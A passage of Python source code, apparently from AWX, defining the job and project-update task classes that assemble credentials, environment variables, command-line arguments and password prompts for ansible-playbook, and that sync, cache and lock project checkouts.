extra_update_fields['result_traceback'] = traceback.format_exc()
logger.exception('%s Exception occurred while running task', self.instance.log_format)
finally:
logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.event_ct)
try:
self.post_run_hook(self.instance, status)
except PostRunError as exc:
if status == 'successful':
status = exc.status
extra_update_fields['job_explanation'] = exc.args[0]
if exc.tb:
extra_update_fields['result_traceback'] = exc.tb
except Exception:
logger.exception('{} Post run hook errored.'.format(self.instance.log_format))
self.instance = self.update_model(pk)
self.instance = self.update_model(pk, status=status, emitted_events=self.event_ct, **extra_update_fields)
try:
self.final_run_hook(self.instance, status, private_data_dir, fact_modification_times)
except Exception:
logger.exception('{} Final run hook errored.'.format(self.instance.log_format))
self.instance.websocket_emit_status(status)
if status != 'successful':
if status == 'canceled':
raise AwxTaskError.TaskCancel(self.instance, rc)
else:
raise AwxTaskError.TaskError(self.instance, rc)
@task(queue=get_local_queuename)
class RunJob(BaseTask):
"""
Run a job using ansible-playbook.
"""
model = Job
event_model = JobEvent
event_data_key = 'job_id'
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, job, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user, sudo/su
and ansible-vault.
"""
passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
cred = job.machine_credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
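# Vault credentials with a vault_id are stored under 'vault_password.<vault_id>' so
# each --vault-id <id>@prompt gets its own password; e.g. a hypothetical vault id
# 'prod' produces the key 'vault_password.prod'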
for cred in job.vault_credentials:
field = 'vault_password'
vault_id = cred.get_input('vault_id', default=None)
if vault_id:
field = 'vault_password.{}'.format(vault_id)
if field in passwords:
raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
if value not in ('', 'ASK'):
passwords[field] = value
'''
Only 1 value can be provided for a unique prompt string. Prefer ssh
key unlock over network key unlock.
'''
if 'ssh_key_unlock' not in passwords:
for cred in job.network_credentials:
if cred.inputs.get('ssh_key_unlock'):
passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
break
return passwords
def build_env(self, job, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunJob, self).build_env(job, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Set environment variables needed for inventory and job event
# callbacks to work.
env['JOB_ID'] = str(job.pk)
env['INVENTORY_ID'] = str(job.inventory.pk)
if job.project:
env['PROJECT_REVISION'] = job.project.scm_revision
env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
env['AWX_HOST'] = settings.TOWER_URL_BASE
# Create a directory for ControlPath sockets that is unique to each job
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'
# Set environment variables for cloud credentials.
cred_files = private_data_files.get('credentials', {})
for cloud_cred in job.cloud_credentials:
if cloud_cred and cloud_cred.credential_type.namespace == 'openstack' and cred_files.get(cloud_cred, ''):
env['OS_CLIENT_CONFIG_FILE'] = to_container_path(cred_files.get(cloud_cred, ''), private_data_dir)
for network_cred in job.network_credentials:
env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
ssh_keyfile = cred_files.get(network_cred, '')
if ssh_keyfile:
env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
authorize = network_cred.get_input('authorize', default=False)
env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
if authorize:
env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')
path_vars = (
('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
)
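# Resulting search order for each variable: the project's requirements folder under
# CONTAINER_ROOT first, then any value already present in the environment or
# ansible.cfg, then the documented defaults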
config_values = read_ansible_config(job.project.get_project_path(), list(map(lambda x: x[1], path_vars)))
for env_key, config_setting, folder, default in path_vars:
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def build_args(self, job, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
creds = job.machine_credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible-playbook's default of using
# the current user.
ssh_username = ssh_username or 'root'
args = []
if job.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
if job.become_enabled:
args.append('--become')
if job.diff_mode:
args.append('--diff')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
# Support prompting for multiple vault passwords
for k, v in passwords.items():
if k.startswith('vault_password'):
if k == 'vault_password':
args.append('--ask-vault-pass')
else:
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
args.append('--vault-id')
args.append('{}@prompt'.format(vault_id))
if job.forks:
if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
args.append('--forks=%d' % settings.MAX_FORKS)
else:
args.append('--forks=%d' % job.forks)
if job.force_handlers:
args.append('--force-handlers')
if job.limit:
args.extend(['-l', job.limit])
if job.verbosity:
args.append('-%s' % ('v' * min(5, job.verbosity)))
if job.job_tags:
args.extend(['-t', job.job_tags])
if job.skip_tags:
args.append('--skip-tags=%s' % job.skip_tags)
if job.start_at_task:
args.append('--start-at-task=%s' % job.start_at_task)
return args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
# Define special extra_vars for AWX, combine with job.extra_vars.
extra_vars = job.awx_meta_vars()
if job.extra_vars_dict:
extra_vars.update(json.loads(job.decrypted_extra_vars()))
# By default, all extra vars disallow Jinja2 template usage for
# security reasons; top level key-values defined in JT.extra_vars, however,
# are allowed as "safe" (because they can only be set by users with
# higher levels of privilege - those that have the ability to create and
# edit Job Templates)
safe_dict = {}
if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
safe_dict = job.job_template.extra_vars_dict
return self._write_extra_vars_file(private_data_dir, extra_vars, safe_dict)
def build_credentials_list(self, job):
return job.credentials.prefetch_related('input_sources__source_credential').all()
def get_password_prompts(self, passwords={}):
d = super(RunJob, self).get_password_prompts(passwords)
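# Keys are regexes matched against prompts in the ansible-playbook output; values are
# lookup keys into the dict built by build_passwords(), e.g. a hypothetical vault id
# 'prod' maps r'Vault password \(prod\):\s*?$' to 'vault_password.prod'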
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
d[r'Vault password:\s*?$'] = 'vault_password'
for k, v in passwords.items():
if k.startswith('vault_password.'):
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
return d
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunJob, self).build_execution_environment_params(instance, private_data_dir)
# If this has an insights agent and it is not already mounted then show it
insights_dir = os.path.dirname(settings.INSIGHTS_SYSTEM_ID_FILE)
if instance.use_fact_cache and os.path.exists(insights_dir):
logger.info('Insights fact cache enabled, mounting {0} into the execution environment'.format(insights_dir))
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{insights_dir}:{insights_dir}:Z",
]
)
return params
def pre_run_hook(self, job, private_data_dir):
super(RunJob, self).pre_run_hook(job, private_data_dir)
if job.inventory is None:
error = _('Job could not start because it does not have a valid inventory.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project is None:
error = _('Job could not start because it does not have a valid project.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.execution_environment is None:
error = _('Job could not start because no Execution Environment could be found.')
self.update_model(job.pk, status='error', job_explanation=error)
raise RuntimeError(error)
elif job.project.status in ('error', 'failed'):
msg = _('The project revision for this job template is unknown due to a failed update.')
job = self.update_model(job.pk, status='failed', job_explanation=msg)
raise RuntimeError(msg)
project_path = job.project.get_project_path(check_if_exists=False)
job_revision = job.project.scm_revision
sync_needs = []
source_update_tag = 'update_{}'.format(job.project.scm_type)
branch_override = bool(job.scm_branch and job.scm_branch != job.project.scm_branch)
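# branch_override: the job requests a branch other than the project default, so the
# locally cached revision and roles/collections cache cannot be reused and a sync is
# forced further below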
if not job.project.scm_type:
pass # manual projects are not synced, user has responsibility for that
elif not os.path.exists(project_path):
logger.debug('Performing fresh clone of {} on this instance.'.format(job.project))
sync_needs.append(source_update_tag)
elif job.project.scm_type == 'git' and job.project.scm_revision and (not branch_override):
try:
git_repo = git.Repo(project_path)
if job_revision == git_repo.head.commit.hexsha:
logger.debug('Skipping project sync for {} because commit is locally available'.format(job.log_format))
else:
sync_needs.append(source_update_tag)
except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
logger.debug('Needed commit for {} not in local source tree, will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
else:
logger.debug('Project not available locally, {} will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
has_cache = os.path.exists(os.path.join(job.project.get_cache_path(), job.project.cache_id))
# Galaxy requirements are not supported for manual projects
if job.project.scm_type and ((not has_cache) or branch_override):
sync_needs.extend(['install_roles', 'install_collections'])
if sync_needs:
pu_ig = job.instance_group
pu_en = job.execution_node
sync_metafields = dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
instance_group=pu_ig,
execution_node=pu_en,
celery_task_id=job.celery_task_id,
)
if branch_override:
sync_metafields['scm_branch'] = job.scm_branch
sync_metafields['scm_clean'] = True  # to accommodate force pushes
if 'update_' not in sync_metafields['job_tags']:
sync_metafields['scm_revision'] = job_revision
local_project_sync = job.project.create_project_update(_eager_fields=sync_metafields)
# save the associated job before calling run() so that a
# cancel() call on the job can cancel the project update
job = self.update_model(job.pk, project_update=local_project_sync)
project_update_task = local_project_sync._get_task_class()
try:
# the job private_data_dir is passed so sync can download roles and collections there
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
job = self.update_model(job.pk, scm_revision=local_project_sync.scm_revision)
except Exception:
local_project_sync.refresh_from_db()
if local_project_sync.status != 'canceled':
job = self.update_model(
job.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
job.refresh_from_db()
if job.cancel_flag:
return
else:
# Case where a local sync is not needed: the local tree is already
# up-to-date with the project, so the job runs the project's current version
if job_revision:
job = self.update_model(job.pk, scm_revision=job_revision)
# Project update does not copy the folder, so copy here
RunProjectUpdate.make_local_copy(job.project, private_data_dir, scm_revision=job_revision)
if job.inventory.kind == 'smart':
# cache smart inventory memberships so that the host_filter query is not
# ran inside of the event saving code
update_smart_memberships_for_inventory(job.inventory)
def final_run_hook(self, job, status, private_data_dir, fact_modification_times):
super(RunJob, self).final_run_hook(job, status, private_data_dir, fact_modification_times)
if not private_data_dir:
# If there's no private data dir, that means we didn't get into the
# actual `run()` call; this _usually_ means something failed in
# the pre_run_hook method
return
if job.use_fact_cache:
job.finish_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', 'fact_cache'),
fact_modification_times,
)
try:
inventory = job.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
update_inventory_computed_fields.delay(inventory.id)
@task(queue=get_local_queuename)
class RunProjectUpdate(BaseTask):
model = ProjectUpdate
event_model = ProjectUpdateEvent
event_data_key = 'project_update_id'
def __init__(self, *args, job_private_data_dir=None, **kwargs):
super(RunProjectUpdate, self).__init__(*args, **kwargs)
self.playbook_new_revision = None
self.original_branch = None
self.job_private_data_dir = job_private_data_dir
def event_handler(self, event_data):
super(RunProjectUpdate, self).event_handler(event_data)
returned_data = event_data.get('event_data', {})
if returned_data.get('task_action', '') == 'set_fact':
returned_facts = returned_data.get('res', {}).get('ansible_facts', {})
if 'scm_version' in returned_facts:
self.playbook_new_revision = returned_facts['scm_version']
def build_private_data(self, project_update, private_data_dir):
"""
Return SSH private key data needed for this project update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
"""
private_data = {'credentials': {}}
if project_update.credential:
credential = project_update.credential
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
return private_data
def build_passwords(self, project_update, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key unlock and SCM
username/password.
"""
passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
if project_update.credential:
passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')
passwords['scm_username'] = project_update.credential.get_input('username', default='')
passwords['scm_password'] = project_update.credential.get_input('password', default='')
return passwords
def build_env(self, project_update, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, private_data_files=private_data_files)
env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
env['ANSIBLE_ASK_PASS'] = str(False)
env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
env['DISPLAY'] = '' # Prevent stupid password popup when running tests.
# give ansible a hint about the intended tmpdir to work around issues
# like https://github.com/ansible/ansible/issues/30064
env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
env['PROJECT_UPDATE_ID'] = str(project_update.pk)
if settings.GALAXY_IGNORE_CERTS:
env['ANSIBLE_GALAXY_IGNORE'] = True
# build out env vars for Galaxy credentials (in order)
galaxy_server_list = []
if project_update.project.organization:
for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
auth_url = cred.get_input('auth_url', default=None)
token = cred.get_input('token', default=None)
if token:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
if auth_url:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
galaxy_server_list.append(f'server{i}')
if galaxy_server_list:
env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)
return env
def _build_scm_url_extra_vars(self, project_update):
"""
Helper method to build SCM url and extra vars with parameters needed
for authentication.
"""
extra_vars = {}
if project_update.credential:
scm_username = project_update.credential.get_input('username', default='')
scm_password = project_update.credential.get_input('password', default='')
else:
scm_username = ''
scm_password = ''
scm_type = project_update.scm_type
scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
scm_url_parts = urlparse.urlsplit(scm_url)
# Prefer the username/password in the URL, if provided.
scm_username = scm_url_parts.username or scm_username
scm_password = scm_url_parts.password or scm_password
if scm_username:
if scm_type == 'svn':
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_password = False
if scm_url_parts.scheme != 'svn+ssh':
scm_username = False
elif scm_url_parts.scheme.endswith('ssh'):
scm_password = False
elif scm_type in ('insights', 'archive'):
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
else:
scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
# Pass the extra accept_hostkey parameter to the git module.
if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
extra_vars['scm_accept_hostkey'] = 'true'
return scm_url, extra_vars
def build_inventory(self, instance, private_data_dir):
return 'localhost,'
def build_args(self, project_update, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
args = []
if getattr(settings, 'PROJECT_UPDATE_VVV', False):
args.append('-vvv')
if project_update.job_tags:
args.extend(['-t', project_update.job_tags])
return args
def build_extra_vars_file(self, project_update, private_data_dir):
extra_vars = {}
scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
extra_vars.update(extra_vars_new)
scm_branch = project_update.scm_branch
if project_update.job_type == 'run' and (not project_update.branch_override):
if project_update.project.scm_revision:
scm_branch = project_update.project.scm_revision
elif not scm_branch:
raise RuntimeError('Could not determine a revision to run from project.')
elif not scm_branch:
scm_branch = 'HEAD'
galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
logger.warning('Galaxy role/collection syncing is enabled, but no ' f'credentials are configured for {project_update.project.organization}.')
extra_vars.update(
{
'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
'local_path': os.path.basename(project_update.project.local_path),
'project_path': project_update.get_project_path(check_if_exists=False), # deprecated
'insights_url': settings.INSIGHTS_URL_BASE,
'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
'awx_version': get_awx_version(),
'scm_url': scm_url,
'scm_branch': scm_branch,
'scm_clean': project_update.scm_clean,
'scm_track_submodules': project_update.scm_track_submodules,
'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
}
)
# apply custom refspec from user for PR refs and the like
if project_update.scm_refspec:
extra_vars['scm_refspec'] = project_update.scm_refspec
elif project_update.project.allow_override:
# If branch is override-able, do extra fetch for all branches
extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'
if project_update.scm_type == 'archive':
# for raw archive, prevent error moving files between volumes
extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
return os.path.join('project_update.yml')
def get_password_prompts(self, passwords={}):
d = super(RunProjectUpdate, self).get_password_prompts(passwords)
d[r'Username for.*:\s*?$'] = 'scm_username'
d[r'Password for.*:\s*?$'] = 'scm_password'
d[r'Password:\s*?$'] = 'scm_password'
d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
# FIXME: Configure whether we should auto accept host keys?
d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
return d
def _update_dependent_inventories(self, project_update, dependent_inventory_sources):
scm_revision = project_update.project.scm_revision
inv_update_class = InventoryUpdate._get_task_class()
for inv_src in dependent_inventory_sources:
if not inv_src.update_on_project_update:
continue
if inv_src.scm_last_revision == scm_revision:
logger.debug('Skipping SCM inventory update for `{}` because ' 'project has not changed.'.format(inv_src.name))
continue
logger.debug('Local dependent inventory update for `{}`.'.format(inv_src.name))
with transaction.atomic():
if InventoryUpdate.objects.filter(inventory_source=inv_src, status__in=ACTIVE_STATES).exists():
logger.debug('Skipping SCM inventory update for `{}` because ' 'another update is already active.'.format(inv_src.name))
continue
local_inv_update = inv_src.create_inventory_update(
_eager_fields=dict(
launch_type='scm',
status='running',
instance_group=project_update.instance_group,
execution_node=project_update.execution_node,
source_project_update=project_update,
celery_task_id=project_update.celery_task_id,
)
)
try:
inv_update_class().run(local_inv_update.id)
except Exception:
logger.exception('{} Unhandled exception updating dependent SCM inventory sources.'.format(project_update.log_format))
try:
project_update.refresh_from_db()
except ProjectUpdate.DoesNotExist:
logger.warning('Project update deleted during updates of dependent SCM inventory sources.')
break
try:
local_inv_update.refresh_from_db()
except InventoryUpdate.DoesNotExist:
logger.warning('%s Dependent inventory update deleted during execution.', project_update.log_format)
continue
if project_update.cancel_flag:
logger.info('Project update {} was canceled while updating dependent inventories.'.format(project_update.log_format))
break
if local_inv_update.cancel_flag:
logger.info('Continuing to process project dependencies after {} was canceled'.format(local_inv_update.log_format))
if local_inv_update.status == 'successful':
inv_src.scm_last_revision = scm_revision
inv_src.save(update_fields=['scm_last_revision'])
def release_lock(self, instance):
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_UN)
except IOError as e:
logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, instance.get_lock_file(), e.strerror))
os.close(self.lock_fd)
raise
os.close(self.lock_fd)
self.lock_fd = None
# Note: acquire_lock does not support blocking=False
def acquire_lock(self, instance, blocking=True):
lock_path = instance.get_lock_file()
if lock_path is None:
# If from migration or someone blanked local_path for any other reason, recoverable by save
instance.save()
lock_path = instance.get_lock_file()
if lock_path is None:
raise RuntimeError(u'Invalid lock file path')
try:
self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
except OSError as e:
logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
start_time = time.time()
while True:
try:
instance.refresh_from_db(fields=['cancel_flag'])
if instance.cancel_flag:
logger.debug("ProjectUpdate({0}) was canceled".format(instance.pk))
return
fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno not in (errno.EAGAIN, errno.EACCES):
os.close(self.lock_fd)
logger.error("I/O error({0}) while trying to aquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
else:
time.sleep(1.0)
waiting_time = time.time() - start_time
if waiting_time > 1.0:
logger.info('{} spent {} waiting to acquire lock for local source tree ' 'for path {}.'.format(instance.log_format, waiting_time, lock_path))
def pre_run_hook(self, instance, private_data_dir):
super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
# re-create root project folder if a natural disaster has destroyed it
if not os.path.exists(settings.PROJECTS_ROOT):
os.mkdir(settings.PROJECTS_ROOT)
project_path = instance.project.get_project_path(check_if_exists=False)
if not os.path.exists(project_path):
os.makedirs(project_path) # used as container mount
self.acquire_lock(instance)
self.original_branch = None
if instance.scm_type == 'git' and instance.branch_override:
if os.path.exists(project_path):
git_repo = git.Repo(project_path)
if git_repo.head.is_detached:
self.original_branch = git_repo.head.commit
else:
self.original_branch = git_repo.active_branch
stage_path = os.path.join(instance.get_cache_path(), 'stage')
if os.path.exists(stage_path):
logger.warning('{0} unexpectedly existed before update'.format(stage_path))
shutil.rmtree(stage_path)
os.makedirs(stage_path) # presence of empty cache indicates lack of roles or collections
# the project update playbook is not in a git repo, but lives in a vendoring directory;
# to stay consistent with the ansible-runner model, that directory is copied
# into the runner project folder here
awx_playbooks = self.get_path_to('..', 'playbooks')
copy_tree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
if os.path.isdir(cache_dir):
for entry in os.listdir(cache_dir):
old_path = os.path.join(cache_dir, entry)
if entry not in (keep_value, 'stage'):
# invalidate, then delete
new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
try:
os.rename(old_path, new_path)
shutil.rmtree(new_path)
except OSError:
logger.warning(f"Could not remove cache directory {old_path}")
@staticmethod
def make_local_copy(p, job_private_data_dir, scm_revision=None):
"""Copy project content (roles and collections) to a job private_data_dir
:param object p: Either a project or a project update
:param str job_private_data_dir: The root of the target ansible-runner folder
:param str scm_revision: For branch_override cases, the git revision to copy
"""
project_path = p.get_project_path(check_if_exists=False)
destination_folder = os.path.join(job_private_data_dir, 'project')
if not scm_revision:
scm_revision = p.scm_revision
if p.scm_type == 'git':
git_repo = git.Repo(project_path)
if not os.path.exists(destination_folder):
os.mkdir(destination_folder, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
tmp_branch_name = 'awx_internal/{}'.format(uuid4())
# always clone based on specific job revision
if not p.scm_revision:
raise RuntimeError('Unexpectedly could not determine a revision to run from project.')
source_branch = git_repo.create_head(tmp_branch_name, p.scm_revision)
# git clone must take file:// syntax for source repo or else options like depth will be ignored
source_as_uri = Path(project_path).as_uri()
git.Repo.clone_from(
source_as_uri,
destination_folder,
branch=source_branch,
depth=1,
single_branch=True, # shallow, do not copy full history
)
# submodules copied in loop because shallow copies from local HEADs are ideal
# and no git clone submodule options are compatible with minimum requirements
for submodule in git_repo.submodules:
subrepo_path = os.path.abspath(os.path.join(project_path, submodule.path))
subrepo_destination_folder = os.path.abspath(os.path.join(destination_folder, submodule.path))
subrepo_uri = Path(subrepo_path).as_uri()
git.Repo.clone_from(subrepo_uri, subrepo_destination_folder, depth=1, single_branch=True)
# force option is necessary because remote refs are not counted, although no information is lost
git_repo.delete_head(tmp_branch_name, force=True)
else:
copy_tree(project_path, destination_folder, preserve_symlinks=1)
# copy over the roles and collection cache to job folder
cache_path = os.path.join(p.get_cache_path(), p.cache_id)
subfolders = []
if settings.AWX_COLLECTIONS_ENABLED:
subfolders.append('requirements_collections')
if settings.AWX_ROLES_ENABLED:
subfolders.append('requirements_roles')
for subfolder in subfolders:
cache_subpath = os.path.join(cache_path, subfolder)
if os.path.exists(cache_subpath):
dest_subpath = os.path.join(job_private_data_dir, subfolder)
copy_tree(cache_subpath, dest_subpath, preserve_symlinks=1)
logger.debug('{0} {1} prepared {2} from cache'.format(type(p).__name__, p.pk, dest_subpath))
def post_run_hook(self, instance, status):
super(RunProjectUpdate, self).post_run_hook(instance, status)
# To avoid hangs, very important to release lock even if errors happen here
try:
if self.playbook_new_revision:
instance.scm_revision = self.playbook_new_revision
instance.save(update_fields=['scm_revision'])
# Roles and collection folders are copied to the durable cache
base_path = instance.get_cache_path()
stage_path = os.path.join(base_path, 'stage')
if status == 'successful' and 'install_' in instance.job_tags:
# Clear other caches before saving this one, and if branch is overridden
# do not clear cache for main branch, but do clear it for other branches
self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
cache_path = os.path.join(base_path, instance.cache_id)
if os.path.exists(stage_path):
if os.path.exists(cache_path):
logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
shutil.rmtree(cache_path)
os.rename(stage_path, cache_path)
logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
elif os.path.exists(stage_path):
shutil.rmtree(stage_path) # cannot trust content update produced
if self.job_private_data_dir:
if status == 'successful':
# copy project folder before resetting to default branch
# because some git-tree-specific resources (like submodules) might matter
self.make_local_copy(instance, self.job_private_data_dir)
if self.original_branch:
# for git project syncs, non-default branches can be problems
# restore to branch the repo was on before this run
try:
self.original_branch.checkout()
except Exception:
# this could have failed due to dirty tree, but difficult to predict all cases
logger.exception('Failed to restore project repo to prior state after {}'.format(instance.log_format))
finally:
self.release_lock(instance)
p = instance.project
if instance.job_type == 'check' and status not in (
'failed',
'canceled',
):
if self.playbook_new_revision:
p.scm_revision = self.playbook_new_revision
else:
if status == 'successful':
logger.error("{} Could not find scm revision in check".format(instance.log_format))
p.playbook_files = p.playbooks
p.inventory_files = p.inventories
p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])
# Update any inventories that depend on this project
dependent_inventory_sources = p.scm_inventory_sources.filter(update_on_project_update=True)
if len(dependent_inventory_sources) > 0:
if status == 'successful' and instance.launch_type != 'sync':
self._update_dependent_inventories(instance, dependent_inventory_sources)
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
